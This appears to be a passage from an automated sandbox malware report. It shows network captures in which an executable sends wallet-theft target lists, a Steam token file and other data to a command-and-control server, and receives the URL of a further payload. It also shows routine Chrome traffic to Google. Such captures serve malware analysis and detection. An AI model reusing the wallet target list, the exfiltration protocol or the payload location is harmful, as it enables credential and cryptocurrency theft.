                                                                                                                                            Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED]
                                                                                                                                            Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
                                                                                                                                            Oct 31, 2024 17:12:28.282936096 CET466OUTPOST /562c1eb14955c897.php HTTP/1.1
                                                                                                                                            Content-Type: multipart/form-data; boundary=----IJEBKKEGDBFIIEBFHIEH
                                                                                                                                            Host: 185.235.128.16
                                                                                                                                            Content-Length: 265
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Data Raw: 2d 2d 2d 2d 2d 2d 49 4a 45 42 4b 4b 45 47 44 42 46 49 49 45 42 46 48 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 65 36 32 30 64 61 65 65 31 39 35 32 36 35 36 37 37 65 30 30 65 31 63 61 39 61 64 33 66 38 39 39 31 31 35 38 62 35 35 64 36 31 34 39 64 64 34 34 37 33 39 65 63 63 62 62 61 62 31 31 37 39 64 62 36 37 62 61 62 62 36 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 42 4b 4b 45 47 44 42 46 49 49 45 42 46 48 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 42 4b 4b 45 47 44 42 46 49 49 45 42 46 48 49 45 48 2d 2d 0d 0a
                                                                                                                                            Data Ascii: ------IJEBKKEGDBFIIEBFHIEHContent-Disposition: form-data; name="token"1e620daee195265677e00e1ca9ad3f8991158b55d6149dd44739eccbbab1179db67babb6------IJEBKKEGDBFIIEBFHIEHContent-Disposition: form-data; name="message"files------IJEBKKEGDBFIIEBFHIEH--
                                                                                                                                            Oct 31, 2024 17:12:28.526721954 CET202INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:12:28 GMT
                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                            Content-Length: 0
                                                                                                                                            Keep-Alive: timeout=5, max=88
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Oct 31, 2024 17:12:28.626774073 CET564OUTPOST /562c1eb14955c897.php HTTP/1.1
                                                                                                                                            Content-Type: multipart/form-data; boundary=----HDAKFCGIJKJKFHIDHIII
                                                                                                                                            Host: 185.235.128.16
                                                                                                                                            Content-Length: 363
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Data Raw: 2d 2d 2d 2d 2d 2d 48 44 41 4b 46 43 47 49 4a 4b 4a 4b 46 48 49 44 48 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 65 36 32 30 64 61 65 65 31 39 35 32 36 35 36 37 37 65 30 30 65 31 63 61 39 61 64 33 66 38 39 39 31 31 35 38 62 35 35 64 36 31 34 39 64 64 34 34 37 33 39 65 63 63 62 62 61 62 31 31 37 39 64 62 36 37 62 61 62 62 36 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 4b 46 43 47 49 4a 4b 4a 4b 46 48 49 44 48 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 4b 46 43 47 49 4a 4b 4a 4b 46 48 49 44 48 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                                                                                                                            Data Ascii: ------HDAKFCGIJKJKFHIDHIIIContent-Disposition: form-data; name="token"1e620daee195265677e00e1ca9ad3f8991158b55d6149dd44739eccbbab1179db67babb6------HDAKFCGIJKJKFHIDHIIIContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------HDAKFCGIJKJKFHIDHIIIContent-Disposition: form-data; name="file"------HDAKFCGIJKJKFHIDHIII--
                                                                                                                                            Oct 31, 2024 17:12:29.075500011 CET202INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:12:28 GMT
                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                            Content-Length: 0
                                                                                                                                            Keep-Alive: timeout=5, max=87
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Oct 31, 2024 17:12:29.186872005 CET204OUTPOST /562c1eb14955c897.php HTTP/1.1
                                                                                                                                            Content-Type: multipart/form-data; boundary=----DGDHJEGIEBFHDGDGHDHI
                                                                                                                                            Host: 185.235.128.16
                                                                                                                                            Content-Length: 113543
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Oct 31, 2024 17:12:29.847628117 CET202INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:12:29 GMT
                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                            Content-Length: 0
                                                                                                                                            Keep-Alive: timeout=5, max=86
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Oct 31, 2024 17:12:29.892923117 CET473OUTPOST /562c1eb14955c897.php HTTP/1.1
                                                                                                                                            Content-Type: multipart/form-data; boundary=----IJJJEBFHDBGIECBFCBKJ
                                                                                                                                            Host: 185.235.128.16
                                                                                                                                            Content-Length: 272
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Data Raw: 2d 2d 2d 2d 2d 2d 49 4a 4a 4a 45 42 46 48 44 42 47 49 45 43 42 46 43 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 65 36 32 30 64 61 65 65 31 39 35 32 36 35 36 37 37 65 30 30 65 31 63 61 39 61 64 33 66 38 39 39 31 31 35 38 62 35 35 64 36 31 34 39 64 64 34 34 37 33 39 65 63 63 62 62 61 62 31 31 37 39 64 62 36 37 62 61 62 62 36 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4a 4a 45 42 46 48 44 42 47 49 45 43 42 46 43 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4a 4a 45 42 46 48 44 42 47 49 45 43 42 46 43 42 4b 4a 2d 2d 0d 0a
                                                                                                                                            Data Ascii: ------IJJJEBFHDBGIECBFCBKJContent-Disposition: form-data; name="token"1e620daee195265677e00e1ca9ad3f8991158b55d6149dd44739eccbbab1179db67babb6------IJJJEBFHDBGIECBFCBKJContent-Disposition: form-data; name="message"ybncbhylepme------IJJJEBFHDBGIECBFCBKJ--
                                                                                                                                            Oct 31, 2024 17:12:30.136113882 CET314INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:12:30 GMT
                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Content-Length: 88
                                                                                                                                            Keep-Alive: timeout=5, max=85
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Data Raw: 61 48 52 30 63 48 4d 36 4c 79 39 76 63 33 52 6c 62 7a 6b 75 5a 58 4e 68 62 47 35 31 64 6d 39 73 4c 6d 4e 76 62 53 39 68 5a 47 70 31 62 6e 52 7a 4c 32 4e 6f 63 6d 39 74 5a 56 38 78 4d 7a 45 75 5a 58 68 6c 66 44 46 38 4d 48 78 54 64 47 46 79 64 48 77 77 66 41 3d 3d
                                                                                                                                            Data Ascii: aHR0cHM6Ly9vc3RlbzkuZXNhbG51dm9sLmNvbS9hZGp1bnRzL2Nocm9tZV8xMzEuZXhlfDF8MHxTdGFydHwwfA==


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            2192.168.2.449762185.235.128.16807308C:\Users\user\Desktop\WGo3ga1AL9.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 31, 2024 17:12:41.150507927 CET473OUTPOST /562c1eb14955c897.php HTTP/1.1
                                                                                                                                            Content-Type: multipart/form-data; boundary=----GDHCGDGIEBKJKFHJJKFC
                                                                                                                                            Host: 185.235.128.16
                                                                                                                                            Content-Length: 272
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Data Raw: 2d 2d 2d 2d 2d 2d 47 44 48 43 47 44 47 49 45 42 4b 4a 4b 46 48 4a 4a 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 65 36 32 30 64 61 65 65 31 39 35 32 36 35 36 37 37 65 30 30 65 31 63 61 39 61 64 33 66 38 39 39 31 31 35 38 62 35 35 64 36 31 34 39 64 64 34 34 37 33 39 65 63 63 62 62 61 62 31 31 37 39 64 62 36 37 62 61 62 62 36 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 43 47 44 47 49 45 42 4b 4a 4b 46 48 4a 4a 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 43 47 44 47 49 45 42 4b 4a 4b 46 48 4a 4a 4b 46 43 2d 2d 0d 0a
                                                                                                                                            Data Ascii: ------GDHCGDGIEBKJKFHJJKFCContent-Disposition: form-data; name="token"1e620daee195265677e00e1ca9ad3f8991158b55d6149dd44739eccbbab1179db67babb6------GDHCGDGIEBKJKFHJJKFCContent-Disposition: form-data; name="message"wkkjqaiaxkhb------GDHCGDGIEBKJKFHJJKFC--
                                                                                                                                            Oct 31, 2024 17:12:43.509567976 CET203INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:12:41 GMT
                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                            Content-Length: 0
                                                                                                                                            Keep-Alive: timeout=5, max=100
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: text/html; charset=UTF-8


                                                                                                                                            HTTPS Proxied Packets

                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            0192.168.2.449736142.250.185.1004437664C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:12:10 UTC615OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                            Host: www.google.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCI/KzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=
                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            2024-10-31 16:12:10 UTC1266INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:12:10 GMT
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Expires: -1
                                                                                                                                            Cache-Control: no-cache, must-revalidate
                                                                                                                                            Content-Type: text/javascript; charset=UTF-8
                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                            Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-PKQ7s_vMRNK1dSPGPbAqrg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                            Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                            Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                            Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                            Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                            Accept-CH: Sec-CH-UA-Platform
                                                                                                                                            Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                            Accept-CH: Sec-CH-UA-Arch
                                                                                                                                            Accept-CH: Sec-CH-UA-Model
                                                                                                                                            Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                            Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                            Permissions-Policy: unload=()
                                                                                                                                            Content-Disposition: attachment; filename="f.txt"
                                                                                                                                            Server: gws
                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                            Accept-Ranges: none
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Connection: close
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            2024-10-31 16:12:10 UTC112INData Raw: 33 31 62 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 64 6f 64 67 65 72 73 20 79 61 6e 6b 65 65 73 20 77 6f 72 6c 64 20 73 65 72 69 65 73 20 62 61 73 65 62 61 6c 6c 22 2c 22 63 68 72 6f 6d 61 6b 6f 70 69 61 20 73 61 6c 65 73 22 2c 22 68 75 72 72 69 63 61 6e 65 73 20 74 72 6f 70 69 63 61 6c 20 73 74 6f 72 6d 73 22 2c 22 70 6f 77 65 72 62 61
                                                                                                                                            Data Ascii: 31b)]}'["",["dodgers yankees world series baseball","chromakopia sales","hurricanes tropical storms","powerba
                                                                                                                                            2024-10-31 16:12:10 UTC690INData Raw: 6c 6c 20 6a 61 63 6b 70 6f 74 22 2c 22 69 70 6c 20 32 30 32 35 20 61 75 63 74 69 6f 6e 22 2c 22 6d 79 73 74 65 72 79 20 6d 61 6e 6f 72 20 6d 6f 6e 6f 70 6f 6c 79 20 67 6f 20 72 65 77 61 72 64 73 22 2c 22 64 65 6d 69 20 6d 6f 6f 72 65 20 74 68 65 20 73 75 62 73 74 61 6e 63 65 20 73 74 72 65 61 6d 69 6e 67 22 2c 22 64 69 6c 6c 20 70 69 63 6b 6c 65 20 73 61 6e 64 77 69 63 68 20 6a 69 6d 6d 79 20 6a 6f 68 6e 73 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d
                                                                                                                                            Data Ascii: ll jackpot","ipl 2025 auction","mystery manor monopoly go rewards","demi moore the substance streaming","dill pickle sandwich jimmy johns"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbm
                                                                                                                                            2024-10-31 16:12:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 0


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            1192.168.2.449737142.250.185.1004437664C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:12:10 UTC518OUTGET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                                            Host: www.google.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCI/KzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=
                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            2024-10-31 16:12:11 UTC1042INHTTP/1.1 200 OK
                                                                                                                                            Version: 690498177
                                                                                                                                            Content-Type: application/json; charset=UTF-8
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                            Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                            Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                            Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                            Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                            Accept-CH: Sec-CH-UA-Platform
                                                                                                                                            Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                            Accept-CH: Sec-CH-UA-Arch
                                                                                                                                            Accept-CH: Sec-CH-UA-Model
                                                                                                                                            Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                            Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                            Permissions-Policy: unload=()
                                                                                                                                            Content-Disposition: attachment; filename="f.txt"
                                                                                                                                            Date: Thu, 31 Oct 2024 16:12:10 GMT
                                                                                                                                            Server: gws
                                                                                                                                            Cache-Control: private
                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                            Accept-Ranges: none
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Connection: close
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            2024-10-31 16:12:11 UTC336INData Raw: 31 63 62 30 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 31 64 20 67 62 5f 50 65 20 67 62 5f 70 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65
                                                                                                                                            Data Ascii: 1cb0)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_1d gb_Pe gb_pd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
                                                                                                                                            2024-10-31 16:12:11 UTC1378INData Raw: 20 67 62 5f 6e 64 20 67 62 5f 45 64 20 67 62 5f 6b 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 76 64 20 67 62 5f 71 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30
                                                                                                                                            Data Ascii: gb_nd gb_Ed gb_kd\"\u003e\u003cdiv class\u003d\"gb_vd gb_qd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u00
                                                                                                                                            2024-10-31 16:12:11 UTC1378INData Raw: 30 33 63 5c 2f 61 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 76 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 74 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 76
                                                                                                                                            Data Ascii: 03c\/a\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_vd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_td\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_v
                                                                                                                                            2024-10-31 16:12:11 UTC1378INData Raw: 76 67 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30
